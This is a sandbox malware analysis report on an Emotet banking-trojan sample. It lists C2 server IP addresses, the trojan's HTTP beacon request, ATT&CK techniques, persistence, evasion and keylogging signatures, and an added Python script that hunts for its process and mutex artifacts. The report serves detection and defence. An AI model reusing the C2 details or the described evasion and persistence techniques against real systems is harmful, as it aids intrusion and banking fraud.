Analysis Report m5wpHJDhIl

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 211727
Start date: 28.02.2020
Start time: 09:40:45
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 22s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: m5wpHJDhIl (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winEXE@7/0@0/11
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 85.8% (good quality ratio 83%)
  • Quality average: 78.8%
  • Quality standard deviation: 27.8%
HCA Information:
  • Successful, ratio: 82%
  • Number of executed functions: 103
  • Number of non-executed functions: 347
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): MusNotifyIcon.exe, conhost.exe, CompatTelRunner.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: Emotet
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

The matrix is listed per tactic; matched techniques carry the count badge shown in the matrix in parentheses.

Initial Access: Valid Accounts (1), Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service
Execution: Execution through API (121), Command-Line Interface (2), Service Execution (12), Scheduled Task, Command-Line Interface, Graphical User Interface, Scripting, Third-party Software
Persistence: Hidden Files and Directories (1), Valid Accounts (1), Modify Existing Service (11), New Service (2), Shortcut Modification, Modify Existing Service, Path Interception, Logon Scripts
Privilege Escalation: Valid Accounts (1), Access Token Manipulation (1), Process Injection (1), New Service (2), File System Permissions Weakness, New Service, Scheduled Task, Process Injection
Defense Evasion: Deobfuscate/Decode Files or Information (1), File Deletion (1), Obfuscated Files or Information (2), Masquerading (12), Hidden Files and Directories (1), Valid Accounts (1), Access Token Manipulation (1), Process Injection (1)
Credential Access: Input Capture (1), Network Sniffing, Input Capture, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception, Bash History
Discovery: System Time Discovery (2), Security Software Discovery (2), System Service Discovery (1), File and Directory Discovery (2), System Information Discovery (36), Process Discovery (2), Application Window Discovery (1), Network Service Scanning
Lateral Movement: Remote File Copy (1), Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash, Remote Desktop Protocol
Collection: Input Capture (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Data Staged, Screen Capture, Email Collection, Clipboard Data
Exfiltration: Data Encrypted (11), Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel, Exfiltration Over Alternative Protocol
Command and Control: Uncommonly Used Port (1), Remote File Copy (1), Standard Cryptographic Protocol (22), Standard Non-Application Layer Protocol (1), Standard Application Layer Protocol (12), Commonly Used Port, Uncommonly Used Port, Standard Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Data Encrypted for Impact (1), Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue

Signature Overview


AV Detection:

Antivirus detection for sample
  • Source: m5wpHJDhIl.exe | Avira: detection malicious, Label: TR/AD.Emotet.vzbjd
Found malware configuration
  • Source: wrapgroup.exe.2192.6.memstr | Malware Configuration Extractor: Emotet {"C2 list": ["120.150.246.241/K9czcmT3hzV"]}
Multi AV Scanner detection for submitted file
  • Source: m5wpHJDhIl.exe | Virustotal: Detection: 81%
  • Source: m5wpHJDhIl.exe | ReversingLabs: Detection: 80%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00402B10 CryptStringToBinaryA, _malloc
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00402B10 CryptStringToBinaryA, _malloc
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0211207B CryptDuplicateHash, CryptEncrypt, CryptDestroyHash
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0211215A CryptDuplicateHash, CryptDecrypt, CryptVerifySignatureW, CryptDestroyHash
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_02111F11 CryptExportKey
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_02111F56 CryptGetHashParam
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_02111F75 CryptAcquireContextW, CryptImportKey, LocalFree, CryptReleaseContext
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_02111FFC CryptGenKey, CryptCreateHash, CryptDestroyKey, CryptDestroyKey, CryptReleaseContext
  • Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F2207B CryptDuplicateHash, CryptEncrypt, CryptDestroyHash
  • Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F21FFC CryptGenKey, CryptCreateHash, CryptDestroyKey, CryptDestroyKey, CryptReleaseContext
  • Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F21F75 CryptAcquireContextW, CryptDecodeObjectEx, CryptImportKey, LocalFree, CryptReleaseContext
  • Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F2215A CryptDuplicateHash, CryptDecrypt, CryptVerifySignatureW, CryptDestroyHash
  • Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F21F11 CryptExportKey
  • Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F21F56 CryptGetHashParam

Spreading:

Contains functionality to enumerate / list files inside a directory
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_004190B9 __EH_prolog3, GetFullPathNameA, PathIsUNCA, GetVolumeInformationA, CharUpperA, FindFirstFileA, FindClose, lstrlenA
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00402560 FindFirstFileA, SendMessageA, GetFullPathNameA, FindNextFileA, FindNextFileA, FindNextFileA, FindClose
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00419C0B lstrlenA, FindFirstFileA, FindClose
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_004190B9 __EH_prolog3, GetFullPathNameA, PathIsUNCA, GetVolumeInformationA, CharUpperA, FindFirstFileA, FindClose, lstrlenA
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00402560 FindFirstFileA, SendMessageA, GetFullPathNameA, FindNextFileA, FindNextFileA, FindNextFileA, FindClose
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00419C0B lstrlenA, FindFirstFileA, FindClose

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Source: Traffic | Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.5:49782 -> 165.227.156.155:443
  • Source: Traffic | Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.5:49788 -> 67.225.179.64:8080
  • Source: Traffic | Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.5:49790 -> 176.31.200.130:8080
  • Source: Traffic | Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.5:49795 -> 120.150.246.241:80
Detected TCP or UDP traffic on non-standard ports
  • Source: global traffic | TCP traffic: 192.168.2.5:49779 -> 66.209.97.122:8080
  • Source: global traffic | TCP traffic: 192.168.2.5:49780 -> 174.77.190.137:8080
  • Source: global traffic | TCP traffic: 192.168.2.5:49786 -> 167.99.105.223:7080
  • Source: global traffic | TCP traffic: 192.168.2.5:49788 -> 67.225.179.64:8080
  • Source: global traffic | TCP traffic: 192.168.2.5:49790 -> 176.31.200.130:8080
  • Source: global traffic | TCP traffic: 192.168.2.5:49792 -> 5.196.74.210:8080
Uses a known web browser user agent for HTTP communication
  • Source: global traffic | HTTP traffic detected: POST /K9czcmT3hzV HTTP/1.1 | Referer: http://120.150.246.241/K9czcmT3hzV | Content-Type: application/x-www-form-urlencoded | DNT: 1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 120.150.246.241 | Content-Length: 586 | Connection: Keep-Alive | Cache-Control: no-cache | Body: 586 bytes of URL-encoded form data under the parameter name K9czcmT3hzV (encrypted payload, not reproduced here)
Connects to IPs without corresponding DNS lookups
Contains functionality to download additional files from the internet
  • Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F21383 InternetReadFile
Posts data to webserver
  • Source: unknown | HTTP traffic detected: POST /K9czcmT3hzV HTTP/1.1 | Referer: http://120.150.246.241/K9czcmT3hzV | Content-Type: application/x-www-form-urlencoded | DNT: 1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 120.150.246.241 | Content-Length: 586 | Connection: Keep-Alive | Cache-Control: no-cache | Body: 586 bytes of URL-encoded form data under the parameter name K9czcmT3hzV (encrypted payload, not reproduced here)
Urls found in memory or binary data
  • Source: wrapgroup.exe, 00000006.00000002.3815163328.0000000000199000.00000004.00000001.sdmp | String found in binary or memory: http://120.150.246.241/K9czcmT3hzV
Uses HTTPS
  • Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0040D763 GetKeyState, GetKeyState, GetKeyState, GetFocus, GetDesktopWindow, SendMessageA, SendMessageA, GetParent
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00407C71 GetKeyState, GetKeyState, GetKeyState, GetKeyState, SendMessageA
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0040D763 GetKeyState, GetKeyState, GetKeyState, GetFocus, GetDesktopWindow, SendMessageA, SendMessageA, GetParent
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00407C71 GetKeyState, GetKeyState, GetKeyState, GetKeyState, SendMessageA

E-Banking Fraud:

Detected Emotet e-Banking trojan
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0211DE9C
  • Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F2DE9C
Yara detected Emotet
  • Source: Yara match | File source: 00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: 00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: 00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: 00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: 00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: 00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_02111F75 CryptAcquireContextW, CryptImportKey, LocalFree, CryptReleaseContext
  • Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F21F75 CryptAcquireContextW, CryptDecodeObjectEx, CryptImportKey, LocalFree, CryptReleaseContext

System Summary:

Malicious sample detected (through community Yara rule)
  • Source: 00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload, Author: kevoreilly
  • Source: 00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload, Author: kevoreilly
  • Source: 00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload, Author: kevoreilly
  • Source: 00000001.00000002.2127695275.0000000002111000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload, Author: kevoreilly
  • Source: 00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload, Author: kevoreilly
  • Source: 00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload, Author: kevoreilly
  • Source: 00000000.00000002.2102869064.0000000002281000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload, Author: kevoreilly
  • Source: 00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload, Author: kevoreilly
Contains functionality to delete services
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0211E068 GetModuleFileNameW, lstrlenW, OpenServiceW, DeleteService, CloseServiceHandle
Contains functionality to launch a process as a different user
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_02111D2B CreateProcessAsUserW, CreateProcessW
Creates files inside the system directory
  • Source: C:\Windows\SysWOW64\wrapgroup.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
Deletes files inside the Windows folder
  • Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | File deleted: C:\Windows\SysWOW64\wrapgroup.exe:Zone.Identifier
Detected potential crypto function
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 00404190 appears 32 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 0041DD10 appears 119 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 0041D973 appears 242 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 0041289D appears 66 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 00401530 appears 38 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 00424B8E appears 46 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 0041D9A6 appears 36 times
PE file contains strange resourcesShow sources
Source: m5wpHJDhIl.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: m5wpHJDhIl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: m5wpHJDhIl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: m5wpHJDhIl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: m5wpHJDhIl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: m5wpHJDhIl.exe, 00000000.00000002.2102390284.0000000000445000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWinDir.EXEF vs m5wpHJDhIl.exe
Source: m5wpHJDhIl.exe, 00000001.00000002.2127842166.0000000002250000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs m5wpHJDhIl.exe
Source: m5wpHJDhIl.exe, 00000001.00000002.2127978991.00000000022B0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs m5wpHJDhIl.exe
Source: m5wpHJDhIl.exe, 00000001.00000002.2127978991.00000000022B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs m5wpHJDhIl.exe
Source: m5wpHJDhIl.exe, 00000001.00000002.2127150926.0000000000445000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWinDir.EXEF vs m5wpHJDhIl.exe
Source: m5wpHJDhIl.exeBinary or memory string: OriginalFilenameWinDir.EXEF vs m5wpHJDhIl.exe
Yara signature matchShow sources
Source: 00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.2127695275.0000000002111000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.2102869064.0000000002281000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification label
Source: classification engine | Classification label: mal100.bank.troj.evad.winEXE@7/0@0/11
Contains functionality to check free disk space
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0041181E __EH_prolog3,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA (0_2_0041181E)
Contains functionality to create services
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle (1_2_0211E138)
Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle (6_2_00F2E138)
Contains functionality to enum processes or threads
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_02281943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle (0_2_02281943)
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00402B60 FindResourceA,LoadResource,SizeofResource,LockResource,CreateFileMappingW,MapViewOfFile,CharLowerA (0_2_00402B60)
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0211E138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle (1_2_0211E138)
Creates mutexes
Source: C:\Windows\SysWOW64\wrapgroup.exe | Mutant created: \BaseNamedObjects\Global\IB0A8168B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\IB0A8168B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\MB0A8168B
PE file has an executable .text section and no other executable section
Source: m5wpHJDhIl.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: m5wpHJDhIl.exe | Virustotal: Detection: 81%
Source: m5wpHJDhIl.exe | ReversingLabs: Detection: 80%
Sample requires command line parameters (based on API chain)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_0-30626)
Source: C:\Windows\SysWOW64\wrapgroup.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_5-2136)
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\m5wpHJDhIl.exe 'C:\Users\user\Desktop\m5wpHJDhIl.exe'
Source: unknown | Process created: C:\Users\user\Desktop\m5wpHJDhIl.exe --df6ec7c8
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p
Source: unknown | Process created: C:\Windows\SysWOW64\wrapgroup.exe C:\Windows\SysWOW64\wrapgroup.exe
Source: unknown | Process created: C:\Windows\SysWOW64\wrapgroup.exe --4f0f594b
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Process created: C:\Users\user\Desktop\m5wpHJDhIl.exe --df6ec7c8
Source: C:\Windows\SysWOW64\wrapgroup.exe | Process created: C:\Windows\SysWOW64\wrapgroup.exe --4f0f594b
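Two host-level artifacts in this report are cheap to hunt for: each stage relaunches its own image with a single `--<8 hex digits>` argument (Spawns processes), and the payload creates a pair of `Global\I<id>` / `Global\M<id>` mutexes that share one 8-hex id (Creates mutexes). The Python below is an added example, not code from the Joe Sandbox report or from the sample; the event records and mutex names are constructed from the entries above, and the record fields (parent_image, image, cmdline) are an assumption about what a Sysmon or EDR export provides.

```python
"""Hunting checks for the process and mutex artifacts this report records.

Added example; not code from the Joe Sandbox report or from the sample.
The events and mutex names below are constructed from the 'Spawns processes'
and 'Creates mutexes' entries; the record fields (parent_image, image,
cmdline) are an assumption about what a Sysmon/EDR export provides.
"""
from __future__ import annotations

import re
from typing import Iterable, NamedTuple

# Argument form in the report: a lone "--" followed by exactly 8 hex digits.
RELAUNCH_ARG = re.compile(r"^--[0-9a-fA-F]{8}$")
# Mutex names in the report: Global\I<8 hex> and Global\M<8 hex>.
MUTEX_NAME = re.compile(r"Global\\(?P<kind>[IM])(?P<id>[0-9A-F]{8})$")


class ProcEvent(NamedTuple):
    parent_image: str
    image: str
    cmdline: str


def split_cmdline(cmdline: str) -> list[str]:
    """Split a command line into argv: quoted first token (" or ') or whitespace."""
    m = re.match(r"""^(["'])(.+?)\1\s*(.*)$""", cmdline)
    if m:
        return [m.group(2)] + m.group(3).split()
    return cmdline.split()


def is_self_relaunch(ev: ProcEvent) -> bool:
    """True when a process starts a second copy of its own image whose only
    argument is --<8 hex>, as m5wpHJDhIl.exe and wrapgroup.exe do above."""
    argv = split_cmdline(ev.cmdline)
    if len(argv) != 2:
        return False
    same_image = argv[0].lower() == ev.image.lower() == ev.parent_image.lower()
    return same_image and RELAUNCH_ARG.match(argv[1]) is not None


def paired_mutex_ids(names: Iterable[str]) -> set[str]:
    """Ids for which both the I- and the M-prefixed Global mutex were created."""
    kinds_by_id: dict[str, set[str]] = {}
    for name in names:
        m = MUTEX_NAME.search(name)
        if m:
            kinds_by_id.setdefault(m.group("id"), set()).add(m.group("kind"))
    return {i for i, kinds in kinds_by_id.items() if kinds == {"I", "M"}}


# Constructed from the report's process tree and mutex entries.
EVENTS = [
    ProcEvent("unknown", r"C:\Users\user\Desktop\m5wpHJDhIl.exe",
              r"'C:\Users\user\Desktop\m5wpHJDhIl.exe'"),
    ProcEvent(r"C:\Users\user\Desktop\m5wpHJDhIl.exe",
              r"C:\Users\user\Desktop\m5wpHJDhIl.exe",
              r"C:\Users\user\Desktop\m5wpHJDhIl.exe --df6ec7c8"),
    ProcEvent("unknown", r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\system32\svchost.exe -k wusvcs -p"),
    ProcEvent(r"C:\Windows\SysWOW64\wrapgroup.exe",
              r"C:\Windows\SysWOW64\wrapgroup.exe",
              r"C:\Windows\SysWOW64\wrapgroup.exe --4f0f594b"),
]
MUTEXES = [
    r"\BaseNamedObjects\Global\IB0A8168B",
    r"\Sessions\1\BaseNamedObjects\Global\IB0A8168B",
    r"\Sessions\1\BaseNamedObjects\Global\MB0A8168B",
]


def hunt(events: Iterable[ProcEvent], mutexes: Iterable[str]) -> dict[str, list[str]]:
    """Summarise both indicators; an empty dict means nothing matched."""
    out: dict[str, list[str]] = {}
    relaunches = [ev.cmdline for ev in events if is_self_relaunch(ev)]
    if relaunches:
        out["self_relaunch"] = relaunches
    ids = sorted(paired_mutex_ids(mutexes))
    if ids:
        out["paired_mutex_ids"] = ids
    return out


if __name__ == "__main__":
    print(hunt(EVENTS, MUTEXES))
```

The 8-hex value differs between the two stages in this very run (df6ec7c8 for the dropper, 4f0f594b for wrapgroup.exe), so the check matches the shape of the argument, never a literal value; likewise the mutex check keys on the I/M pair sharing an id rather than on B0A8168B itself.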
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
PE file contains a mix of resources often seen in goodware
Source: m5wpHJDhIl.exe | Static PE information: resource type: RT_CURSOR
Source: m5wpHJDhIl.exe | Static PE information: resource type: RT_BITMAP
Source: m5wpHJDhIl.exe | Static PE information: resource type: RT_ICON
Source: m5wpHJDhIl.exe | Static PE information: resource type: RT_MENU
Source: m5wpHJDhIl.exe | Static PE information: resource type: RT_DIALOG
Source: m5wpHJDhIl.exe | Static PE information: resource type: RT_STRING
Source: m5wpHJDhIl.exe | Static PE information: resource type: RT_ACCELERATOR
Source: m5wpHJDhIl.exe | Static PE information: resource type: RT_GROUP_ICON

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0042A3CB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer (0_2_0042A3CB)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0041DA12 push ecx; ret (0_2_0041DA25)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0041DD55 push ecx; ret (0_2_0041DD68)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0226FAF1 push edx; retf (0_2_0226FAF8)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0226FAD3 push edx; iretd (0_2_0226FAD4)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0226FB0F push edx; retf (0_2_0226FB10)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0226FB1A push edx; retf (0_2_0226FB48)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0226FB77 push edx; iretd (0_2_0226FB84)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0226FD71 push edx; retf (0_2_0226FD80)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0226FD52 push edx; iretd (0_2_0226FD70)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0041DA12 push ecx; ret (1_2_0041DA25)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0041DD55 push ecx; ret (1_2_0041DD68)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0075FAF1 push edx; retf (1_2_0075FAF8)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0075FAD3 push edx; iretd (1_2_0075FAD4)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0075FB77 push edx; iretd (1_2_0075FB84)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0075FB1A push edx; retf (1_2_0075FB48)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0075FB0F push edx; retf (1_2_0075FB10)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0075FD71 push edx; retf (1_2_0075FD80)
